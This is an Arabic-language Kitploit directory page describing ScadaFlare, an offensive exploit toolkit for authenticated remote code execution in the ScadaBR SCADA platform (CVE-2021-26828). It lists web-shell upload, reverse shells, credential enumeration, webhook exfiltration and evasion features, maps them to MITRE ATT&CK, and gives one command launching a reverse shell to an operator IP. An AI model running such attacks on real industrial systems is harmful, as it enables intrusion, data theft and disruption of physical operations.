Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2021-26828-Ultimate — ScadaFlare إطار عمل استغلال RCE مصادق عليه لـ ScadaBR (CVE-2021-26828) OpenPLC ScadaBR | Kitploit
أدوات/GitHubGitHub/ridpath/cve-2021-26828-ultimate
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالأمن SCADA/ICSاستغلال تطبيقات الويبجمع المعلوماتاختبار الاختراقالقيادة والسيطرةالفريق الأحمر
GitHubridpath/cve-2021-26828-ultimate

CVE-2021-26828-Ultimate

ScadaFlare إطار عمل استغلال RCE مصادق عليه لـ ScadaBR (CVE-2021-26828) OpenPLC ScadaBR

58منذ 9 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
عرض المستودع
مشاركة

ScadaFlare - CVE-2021-26828 مجموعة أدوات استغلال RCE مصادق عليه

license: MIT tested-on: HTB Alchemy target: ScadaBR <1.1.0 platform: Linux/Windows

أداة استغلال RCE معيارية بعد المصادقة تستهدف ScadaBR <1.1.0، معززة لعمليات الفريق الأحمر.

ScadaFlare Demo

الميزات

  • يرفع شِل .jsp مسلّح عبر view_edit.shtm
  • يدعم حمولات لينكس وويندوز
  • دعم وكيل SOCKS5 / HTTP
  • تشغيل شِل عكسي (قياسي أو base64)
  • وحدات تعداد (قاعدة بيانات، بيانات اعتماد، Log4Shell، إلخ)
  • استخراج عبر Webhook (Slack / Discord)
  • توليد سكربت موارد Metasploit
  • دعم التنظيف (مفتاح الإيقاف)

تخطيط تقنيات MITRE ATT&CK

المرحلةالتقنيةالمعرف
الوصول الأولي (بعد المصادقة)حسابات صالحةT1078
التنفيذاستغلال تطبيق مواجه للجمهورT1190
تنفيذ الأوامرشِل ويبT1505.003
إجراءات الامتيازاتتعديل محتوى الويبT1505
الوصول إلى بيانات الاعتمادبيانات اعتماد في ملفات الإعداداتT1552.001
الاكتشافاكتشاف النظام البعيدT1018
استخراج البياناتاستخراج عبر خدمة ويبT1567.002
التخفي عن الدفاعوكيل ونفق بروتوكولT1090

CVE

  • CVE-2021-26828
  • اكتشفها Fellipe Oliveira
  • الأداة مُحسّنة ومعيارية

لماذا هذا موجود

تم تطوير هذه الأداة أثناء تحليل سيناريو مختبر HTB Pro: Alchemy. كانت الإثبات الأصلي (PoC) من قبل Fellipe Oliveira قويًا لكن:

  • مكتوب بلغة Python 2
  • يفتقر لميزات حديثة مثل دعم الوكيل، تنظيف الشل، تسلسل التعداد
  • كان من الصعب توسيعه أو دمجه في سير عمل الفرق الحمراء

هذا الإصدار، ScadaFlare، هو إعادة كتابة كاملة بلغة Python 3 مع دعم معياري، استراتيجيات تمويه متعددة، تجاوز كشف نظام التشغيل، تكامل webhook، دعم وكيل SOCKS، وسلاسل تعداد للاستخدام العملي للمشغلين.

الاستخدام

root@kitploit:~
python3 scadaflare.py http://172.16.0.20:80 admin admin \
  --reverse-ip 10.10.14.44 --reverse-port 4445 \
  --verbose --cleanup

للاستخدام القانوني والأخلاقي فقط

ScadaFlare مصممة فقط من أجل:

  • تعليم الاختراق الأخلاقي
  • اختبار مختبرات SCADA
  • البحث الدفاعي والتحقق من الثغرات

الاستخدام غير المصرح به ضد الأنظمة الصناعية الحقيقية يمكن أن:

  • يعطل العمليات المادية
  • يسبب أضرارًا أو مخاطر سلامة
  • يؤدي إلى عواقب قانونية شديدة

باستخدام هذه الأداة أنت تقبل المسؤولية الكاملة عن:

  • الحصول على تفويض كتابي صريح
  • العمل فقط ضمن البيئات المعتمدة

الترخيص

رخصة MIT – انظر LICENSE

تنزيل الأداة